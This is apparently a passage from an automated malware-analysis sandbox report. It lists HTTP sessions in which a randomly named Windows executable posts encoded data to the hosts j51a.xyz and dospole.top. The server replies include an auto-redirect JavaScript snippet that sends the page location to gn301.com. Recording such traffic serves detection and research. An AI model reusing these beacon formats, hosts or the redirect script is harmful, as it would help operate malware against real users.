                                                      25192.168.2.949740154.12.34.252805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:00.222301960 CEST811OUTPOST /y0md/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.j51a.xyz
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.j51a.xyz
                                                      Referer: http://www.j51a.xyz/y0md/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 6f 6a 77 6c 77 7a 35 68 6a 42 62 2f 2f 6f 6c 68 36 56 67 34 72 57 79 54 32 36 58 6d 48 6e 73 36 5a 6d 31 55 4e 67 34 4d 69 70 41 55 4f 62 63 69 30 44 5a 68 38 36 7a 45 31 65 37 52 54 6a 79 6f 71 57 4c 6c 6d 58 37 54 4a 54 57 6d 6b 5a 31 37 6a 4d 34 75 72 39 56 2f 75 46 47 57 46 4f 30 42 78 46 54 38 32 73 73 42 30 2b 62 5a 2b 33 36 56 37 6d 50 58 63 72 4e 6b 33 30 32 74 69 4c 50 4a 51 6c 4f 6c 61 79 46 64 4a 42 5a 77 71 6b 68 65 74 32 6f 33 77 63 59 61 58 47 7a 33 46 36 4c 4e 6a 47 76 69 6a 32 66 73 70 58 58 39 56 56 58 6a 2b 75 65 76 39 51 58 43 46 76 4f 70
                                                      Data Ascii: lv-=ojwlwz5hjBb//olh6Vg4rWyT26XmHns6Zm1UNg4MipAUObci0DZh86zE1e7RTjyoqWLlmX7TJTWmkZ17jM4ur9V/uFGWFO0BxFT82ssB0+bZ+36V7mPXcrNk302tiLPJQlOlayFdJBZwqkhet2o3wcYaXGz3F6LNjGvij2fspXX9VVXj+uev9QXCFvOp
                                                      Jul 9, 2024 12:10:00.720489025 CEST557INHTTP/1.0 200 OK
                                                      Connection: close
                                                      Cache-Control: max-age=259200
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Length: 428
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED]
                                                      Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.949741154.12.34.252805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:02.804054976 CEST835OUTPOST /y0md/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.j51a.xyz
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.j51a.xyz
                                                      Referer: http://www.j51a.xyz/y0md/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 6f 6a 77 6c 77 7a 35 68 6a 42 62 2f 39 4c 39 68 38 47 34 34 6e 6d 79 51 34 61 58 6d 4f 48 73 2b 5a 6d 4a 55 4e 6b 70 42 6a 62 30 55 4f 2b 59 69 37 69 5a 68 37 36 7a 45 74 4f 37 55 4c 44 79 33 71 57 4f 59 6d 58 48 54 4a 54 71 6d 6b 59 46 37 6a 39 35 34 74 74 56 39 32 31 47 59 4c 75 30 42 78 46 54 38 32 73 49 6e 30 2b 54 5a 2b 6e 4b 56 37 45 6e 49 53 4c 4e 6a 67 45 32 74 6d 4c 50 4e 51 6c 4f 58 61 7a 4a 37 4a 43 78 77 71 68 6c 65 74 48 70 68 35 63 59 59 61 6d 7a 6d 43 36 61 38 6d 45 75 2b 67 51 50 59 7a 47 75 65 53 30 33 39 76 63 58 30 6f 48 58 6c 43 49 48 42 58 42 57 50 37 38 6e 6e 46 34 55 41 50 58 4c 52 2f 35 7a 57 35 51 3d 3d
                                                      Data Ascii: lv-=ojwlwz5hjBb/9L9h8G44nmyQ4aXmOHs+ZmJUNkpBjb0UO+Yi7iZh76zEtO7ULDy3qWOYmXHTJTqmkYF7j954ttV921GYLu0BxFT82sIn0+TZ+nKV7EnISLNjgE2tmLPNQlOXazJ7JCxwqhletHph5cYYamzmC6a8mEu+gQPYzGueS039vcX0oHXlCIHBXBWP78nnF4UAPXLR/5zW5Q==
                                                      Jul 9, 2024 12:10:03.301872969 CEST557INHTTP/1.0 200 OK
                                                      Connection: close
                                                      Cache-Control: max-age=259200
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Length: 428
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED]
                                                      Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.949742154.12.34.252805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:05.373657942 CEST1848OUTPOST /y0md/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.j51a.xyz
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.j51a.xyz
                                                      Referer: http://www.j51a.xyz/y0md/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 6f 6a 77 6c 77 7a 35 68 6a 42 62 2f 39 4c 39 68 38 47 34 34 6e 6d 79 51 34 61 58 6d 4f 48 73 2b 5a 6d 4a 55 4e 6b 70 42 6a 62 73 55 4f 6f 6b 69 30 68 68 68 36 36 7a 45 7a 65 37 56 4c 44 79 2b 71 57 32 63 6d 58 4c 6c 4a 56 6d 6d 72 61 68 37 30 35 4e 34 6b 74 56 39 71 46 47 5a 46 4f 30 59 78 46 44 34 32 73 34 6e 30 2b 54 5a 2b 6b 43 56 73 47 50 49 51 4c 4e 6b 33 30 32 78 69 4c 4f 71 51 6c 47 48 61 7a 64 4e 4f 79 52 77 71 42 56 65 2b 46 78 68 68 4d 59 57 55 47 79 37 43 36 57 6e 6d 45 7a 48 67 51 54 2b 7a 46 4f 65 57 43 75 79 33 74 69 70 79 32 76 33 46 34 50 43 57 48 47 74 6a 66 4b 58 64 35 41 44 52 57 2b 44 78 4a 71 6b 6e 75 67 66 66 74 51 4a 76 6b 57 75 31 46 4f 54 70 6d 4b 75 5a 36 72 64 2b 4e 73 73 33 75 4f 2f 70 62 4e 74 43 6d 37 67 47 78 32 47 61 57 61 68 56 31 55 51 30 30 61 47 54 76 66 4b 39 41 42 38 41 6f 38 51 6e 49 53 37 77 34 53 73 78 54 43 79 74 6b 4f 6d 78 4b 66 77 4a 66 56 4f 37 35 65 71 30 77 34 35 53 52 6b 73 74 4f 70 51 34 4d 52 72 50 4a 35 37 79 6a 37 4a 36 58 7a 72 68 59 [TRUNCATED]
                                                      Data Ascii: lv-=ojwlwz5hjBb/9L9h8G44nmyQ4aXmOHs+ZmJUNkpBjbsUOoki0hhh66zEze7VLDy+qW2cmXLlJVmmrah705N4ktV9qFGZFO0YxFD42s4n0+TZ+kCVsGPIQLNk302xiLOqQlGHazdNOyRwqBVe+FxhhMYWUGy7C6WnmEzHgQT+zFOeWCuy3tipy2v3F4PCWHGtjfKXd5ADRW+DxJqknugfftQJvkWu1FOTpmKuZ6rd+Nss3uO/pbNtCm7gGx2GaWahV1UQ00aGTvfK9AB8Ao8QnIS7w4SsxTCytkOmxKfwJfVO75eq0w45SRkstOpQ4MRrPJ57yj7J6XzrhYnA2ZpMSJvUi5AZwYntD4G/+XVsKOAC0nVkuzgzQ15KllDVigZ/jer5ZKKJpv6D5dHMu8Ptwd90n5LsQsDKqMjvuZF66RZbfFIf0JdMyL/nVualhqiMpYgD6aL29+5Cogvl3NkWu3YFfWjYy3xXe+X+myGvsgah0KlfZj6xy/43ljW3Px9QEp6qf/nXpgUD6Oaw1Gt9uWiwKbI5re4awd03a4H42rSp1jeCjkzRXGSD24AuOiIuyVXB/4IpLhqD2UqTI0EUXqUdfUMqZzhGaceAN5P9bFtSM4dlMnvH9PPe1uN/AGgmj9muFVPPQS7drlkXZif8pkcZvb5YuAzOLAf7PTgxAW6sKoi9oHcNgEUPOCmv3HhprO5kjwy3k0Yp5nT5IBSSGm5IeBKr2BvcXB01zmjPJUeQqFF1f0pEM/hKaPjbfECzXxUPi3ARnr/OECn1oWmZaQT/5TFyU8Udukm9if/4wbwqy/DH+Yac17ggNE32zvmHZmb+A58DLFGFdltcsFWloekzdOJjNXcZDx6t38i6dCLNK9kKUpIxHR7co+SR9JWuC0wSV4+zy1/C7+6TEfOGrrNErJu+veGAyKhv1T759ZPKTf1aS9A6Ls9WMJWfMakbNIgqStroL4OYh6GMsWEi6ZhL7lfyi5Q/3fUvWnVY7AtSx8fz [TRUNCATED]
                                                      Jul 9, 2024 12:10:05.913011074 CEST557INHTTP/1.0 200 OK
                                                      Connection: close
                                                      Cache-Control: max-age=259200
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Length: 428
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED]
                                                      Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.949743154.12.34.252805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:07.968761921 CEST560OUTGET /y0md/?lv-=lhYFzH0o7AOzoOxHjW4ZhXPez5XkAFEXcnJkHRBG9JNzObhY0gQYyKrA4KXJDxiKggydmH3cVTSej7Njru8XjftXonC7MPI4x3rx8vtk99+YtwuNug==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.j51a.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:08.450248003 CEST557INHTTP/1.0 200 OK
                                                      Connection: close
                                                      Cache-Control: max-age=259200
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Length: 428
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED]
                                                      Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      29192.168.2.949744162.254.38.56805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:13.803996086 CEST820OUTPOST /soqq/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dospole.top
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.dospole.top
                                                      Referer: http://www.dospole.top/soqq/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 51 70 6d 76 72 31 36 34 53 59 42 43 35 42 49 6a 55 69 46 2b 43 4e 79 35 73 35 54 6c 4a 73 34 6d 30 65 44 2f 45 70 2f 71 5a 51 54 58 45 4e 64 2b 35 67 70 4e 53 38 4d 31 66 34 2f 45 37 6b 41 36 53 6a 4d 36 43 4e 34 51 4a 4f 6d 6d 47 7a 50 75 37 69 2f 57 79 36 78 4c 54 30 2b 78 4b 32 34 71 59 42 56 50 4e 68 45 61 70 76 51 48 41 44 48 44 6a 41 34 74 31 73 75 51 6e 4a 43 53 53 48 54 73 55 75 39 4f 42 4c 30 54 67 74 67 44 66 45 38 41 7a 68 79 75 51 58 6c 34 45 48 71 59 58 57 76 79 74 65 46 64 36 45 77 6e 66 49 79 6d 58 39 63 30 4b 4f 2b 52 33 61 65 31 54 57 49 4e
                                                      Data Ascii: lv-=Qpmvr164SYBC5BIjUiF+CNy5s5TlJs4m0eD/Ep/qZQTXENd+5gpNS8M1f4/E7kA6SjM6CN4QJOmmGzPu7i/Wy6xLT0+xK24qYBVPNhEapvQHADHDjA4t1suQnJCSSHTsUu9OBL0TgtgDfE8AzhyuQXl4EHqYXWvyteFd6EwnfIymX9c0KO+R3ae1TWIN
                                                      Jul 9, 2024 12:10:14.385708094 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:10:14 GMT
                                                      Server: Apache
                                                      Content-Length: 16052
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                      Jul 9, 2024 12:10:14.385771990 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                      Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                      Jul 9, 2024 12:10:14.385809898 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                      Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                      Jul 9, 2024 12:10:14.385843039 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                      Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                      Jul 9, 2024 12:10:14.385879040 CEST1236INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                      Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                      Jul 9, 2024 12:10:14.385912895 CEST1236INData Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                                      Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                                      Jul 9, 2024 12:10:14.386022091 CEST1236INData Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                                      Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                                      Jul 9, 2024 12:10:14.386068106 CEST1236INData Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                                      Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-w
                                                      Jul 9, 2024 12:10:14.386102915 CEST1236INData Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33
